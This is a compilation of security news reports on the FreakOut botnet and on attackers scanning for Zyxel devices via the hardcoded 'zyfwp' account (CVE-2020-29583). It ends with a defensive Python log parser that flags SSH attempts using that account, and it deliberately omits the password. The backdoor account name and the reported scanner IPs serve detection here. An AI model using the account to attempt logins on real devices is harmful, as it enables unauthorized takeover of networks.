An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel to execute malicious commands.

In FreakOut's case, the compromised devices are configured to communicate with a hardcoded command-and-control (C2) server from where they receive command messages to execute.

The malware also comes with extensive capabilities that allow it to perform various tasks, including port scanning, information gathering, creation and sending of data packets, network sniffing, and DDoS and flooding.

Furthermore, the hosts can be commandeered as a part of a botnet operation for crypto-mining, spreading laterally across the network, and launching attacks on outside targets while masquerading as the victim company.

With hundreds of devices already infected within days of launching the attack, the researchers warn, FreakOut will ratchet up to higher levels in the near future.

For its part, TerraMaster is expected to patch the vulnerability in version 4.2.07. In the meantime, it's recommended that users upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later and laminas-http 2.14.2 to mitigate the risk associated with the flaws.

“What we have identified is a live and ongoing cyber attack campaign targeting specific Linux users,” said Adi Ikan, Head of Network Cybersecurity Research at Check Point. “The attacker behind this campaign is very experienced in cybercrime and highly dangerous.”

"The fact that some of the vulnerabilities exploited were just published, provides us all a good example for highlighting the significance of securing your network on an ongoing basis with the latest patches and updates."


Cybercriminals Ramp Up Exploits Against Serious Zyxel Flaw
7.1.2021 
Exploit  Threatpost

More than 100,000 Zyxel networking products could be vulnerable to a hardcoded credential vulnerability (CVE-2020-29583) potentially allowing cybercriminal device takeover.

Security experts are warning that hackers are ramping up attempts to exploit a high-severity vulnerability that may still be present in over 100,000 Zyxel Communications products.

Zyxel, a Taiwanese manufacturer of networking devices, on Dec. 23 warned of the flaw in its firmware (CVE-2020-29583) and released patches to address the issue. Zyxel devices are generally utilized by small businesses as firewalls and VPN gateways.

This week, several security researchers spotted “opportunistic exploitation” of Zyxel devices that have not yet received the updates addressing the vulnerability.


“Likely due to the holidays, and maybe because [Niels Teusink, who discovered the flaw] did not initially publish the actual password, widespread exploitation via ssh has not started until now,” said Johannes Ullrich, of the SANS Internet Storm Center (ISC), in a Wednesday analysis. “But we are [now] seeing attempts to access our ssh honeypots via these default credentials.”

Ullrich said the scans started on Monday afternoon stemming from one IP (185.153.196.230), and more scans from other IPs (5.8.16.167, 45.155.205.86) joined throughout this week.

“The initial IPs scanning for this are all geo-locating back to Russia,” Ullrich told Threatpost. “But other than that, they are not specifically significant. Some of these IPs have been involved in similar internet wide scans for vulnerabilities before so they are likely part of some criminal’s infrastructure.”

Exploit attempts on a honeypot observed by SANS ISC. Credit: SANS ISC

Separately, researchers with GreyNoise said on Twitter, on Monday, they observed a slew of “opportunistic exploitation of the newly discovered Zyxel USG SSH Backdoor and crawling of SOHO Routers.”

The vulnerability stems from Zyxel devices containing an undocumented account (called zyfwp) that has an unchangeable password – which can be found in cleartext in the firmware, according to Niels Teusink at EYE, who discovered the flaw and published his analysis in tandem with Zyxel’s December advisory.

The flaw, which had a CVSS Score of 7.8 out of 10 (making it high severity), could be exploited by attackers to log in with administrative privileges – and ultimately take over affected devices.

From an attacker perspective, this would give cybercriminals the ability to adjust firewall rules, run malicious code on devices, or launch machine-in-the-middle attacks, Ullrich told Threatpost.

“This can easily be leveraged to compromise workstations protected by the firewall,” he said. “The only limit is the creativity of the attacker.”

The number of devices currently open to attack cannot be pinpointed precisely; however, according to Teusink, more than 100,000 Zyxel devices worldwide expose their web interface to the internet.

Furthermore, “in our experience, most users of these devices will not update the firmware very often,” said Teusink. “Zyxel devices do not expose their firmware version to unauthenticated users, so determining if a device is vulnerable is a bit more difficult.”

Teusink did not reveal the unchangeable password in his analysis – however, it didn’t take long for the hardcoded credentials to be distributed publicly on Twitter.

Affected Zyxel devices include its ATP firewall series, Unified Security Gateway (USG) series and VPN series, for which a patch became available in December 2020. Also affected are the NXC2500 and NXC5500, two devices in Zyxel’s lineup of wireless LAN controllers, which will not receive a patch until Jan. 8, 2021.

Patch details. Credit: Zyxel

Ullrich told Threatpost that patching firewalls and gateways is always “tricky,” especially if the patching must be done remotely. And, another issue is that “due to the holidays, the initial announcement by Zyxel was also somewhat overlooked,” he noted.

Security experts’ advice for potentially affected users? “Update now,” emphasized Ullrich.

He said consumers and businesses using any kind of firewall, gateway or router, regardless of vendor, should limit the exposure of the administrative interface.

“Avoid exposing web-based admin interfaces,” said Ullrich. “Secure ssh access best you can (public keys…). In the case of a hidden admin account, these measures will likely not help, but see if you can disable password authentication. Of course, sometimes, vendors choose to hide ssh keys instead of passwords.”

CVE-2020-29583 is only the latest security issue to plague Zyxel.

In March 2020, researchers warned that Zyxel’s Cloud CNM SecuManager software contained 16 unpatched vulnerabilities that could kick open the doors for hackers to exploit. That same month, the Mirai botnet was discovered attacking Zyxel network-attached storage (NAS) devices using a critical vulnerability in the devices. And in April 2020, the Hoaxcalls botnet was found spreading via an unpatched vulnerability impacting the ZyXEL Cloud CNM SecuManager.


Hackers Exploiting Recently Disclosed Zyxel Vulnerability
6.1.2021 
Exploit  Securityweek

Security researchers have observed the first attempts to compromise Zyxel devices using a recently disclosed vulnerability related to the existence of hardcoded credentials.

The attacks, currently small in numbers, target CVE-2020-29583, a vulnerability affecting several Zyxel firewalls and WLAN controllers that was publicly disclosed at the end of December.

Firmware updates that remove the bug are already available for some of the affected products, but attackers are seizing the moment, attempting to find vulnerable devices before patches have been applied.

Discovered by EYE security researchers, the issue impacts Zyxel USG, ATP, VPN, ZyWALL, and USG FLEX devices and exists because the password for the undocumented user account zyfwp is stored in the firmware in plaintext.

The account is meant for the automatic delivery of firmware updates over FTP and has admin privileges. Thus, attacks targeting vulnerable devices could lead to the compromise of entire networks, researchers warn.

Starting January 3, security researchers at GreyNoise, a company that collects and analyzes Internet-wide scan and attack data, observed the first attempts to exploit this so-called “backdoor account” on Zyxel devices, and they say the attacks do not appear to be targeted in nature, but rather opportunistic.

“Yesterday we saw one device start opportunistically attempting to login to servers on the internet over SSH using the ‘backdoor’ username and password disclosed by Zyxel for CVE-2020-29583. Today, we saw two more, bringing us to a total of three (3) devices,” GreyNoise founder Andrew Morris told SecurityWeek via email.


While these are clear attempts to find and compromise vulnerable Zyxel devices that are exposed to the Internet, attribution is not as straightforward.

“One or more individuals, groups, organizations, or botnet operators” could be behind the attempts, Morris pointed out.
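The SANS ISC honeypot data in the Threatpost piece above and the GreyNoise observations here are both of scanners trying the zyfwp account over SSH. The following Python flags such attempts in an OpenSSH auth log, for example from a honeypot or a jump host in front of the appliances. It is an added example, not SANS ISC or GreyNoise code; the log lines are constructed, reusing the scanner IPs SANS ISC reported, and the one successful login is attributed to a documentation address:

```python
"""Spot SSH logins attempted with the undocumented Zyxel account (zyfwp) in
an OpenSSH auth log.  Added example, not SANS ISC or GreyNoise code.  Only
the account name comes from the disclosure; the log lines are constructed
(scanner IPs as reported by SANS ISC, the accepted login from 192.0.2.77)."""
import re
from collections import defaultdict

BACKDOOR_USERS = {"zyfwp"}
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<outcome>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>[0-9a-fA-F.:]+) port \d+')


def parse_sshd(line):
    """Parse 'Accepted ...' / 'Failed ...' sshd lines; other lines yield None.
    (sshd also logs 'Invalid user X' lines, but each is paired with a
    'Failed password for invalid user X' line, so those are enough.)"""
    m = SSHD_RE.match(line)
    return m.groupdict() if m else None


def backdoor_attempts(lines, users=BACKDOOR_USERS):
    """Group attempts for the backdoor account by source IP.
    'accepted' > 0 means the host actually let the scanner in."""
    by_ip = defaultdict(lambda: {"failed": 0, "accepted": 0, "first": None, "last": None})
    for line in lines:
        rec = parse_sshd(line)
        if not rec or rec["user"] not in users:
            continue
        entry = by_ip[rec["ip"]]
        entry["failed" if rec["outcome"] == "Failed" else "accepted"] += 1
        entry["first"] = entry["first"] or rec["ts"]
        entry["last"] = rec["ts"]
    return dict(by_ip)


def alerts(summary):
    """'critical' when a login with the backdoor account succeeded, else 'scan'."""
    return {ip: ("critical" if s["accepted"] else "scan") for ip, s in summary.items()}


SAMPLE_AUTH_LOG = [  # constructed lines
    "Jan  4 13:02:11 honeypot sshd[2210]: Failed password for invalid user zyfwp from 185.153.196.230 port 41234 ssh2",
    "Jan  4 13:02:14 honeypot sshd[2210]: Failed password for invalid user zyfwp from 185.153.196.230 port 41236 ssh2",
    "Jan  5 07:40:02 honeypot sshd[3301]: Failed password for invalid user zyfwp from 5.8.16.167 port 50122 ssh2",
    "Jan  5 09:12:45 honeypot sshd[3390]: Failed password for invalid user admin from 5.8.16.167 port 50130 ssh2",
    "Jan  6 01:15:09 honeypot sshd[4102]: Failed password for invalid user zyfwp from 45.155.205.86 port 33001 ssh2",
    "Jan  6 02:00:00 usg-lab sshd[4190]: Accepted password for zyfwp from 192.0.2.77 port 40010 ssh2",
    "Jan  6 02:05:00 usg-lab sshd[4195]: Accepted publickey for ops from 10.0.0.4 port 40011 ssh2",
]

if __name__ == "__main__":
    summary = backdoor_attempts(SAMPLE_AUTH_LOG)
    for ip, level in alerts(summary).items():
        print(level, ip, summary[ip])
```

The password is deliberately absent; only the account name is needed to recognise the attempts. A Zyxel appliance runs its own SSH service rather than OpenSSH, so on the device itself the signal has to come from its own logs or from the network in front of it. As Ullrich notes above, disabling password authentication where the device allows it and keeping the admin interface off the internet are what limit the damage from an account like this.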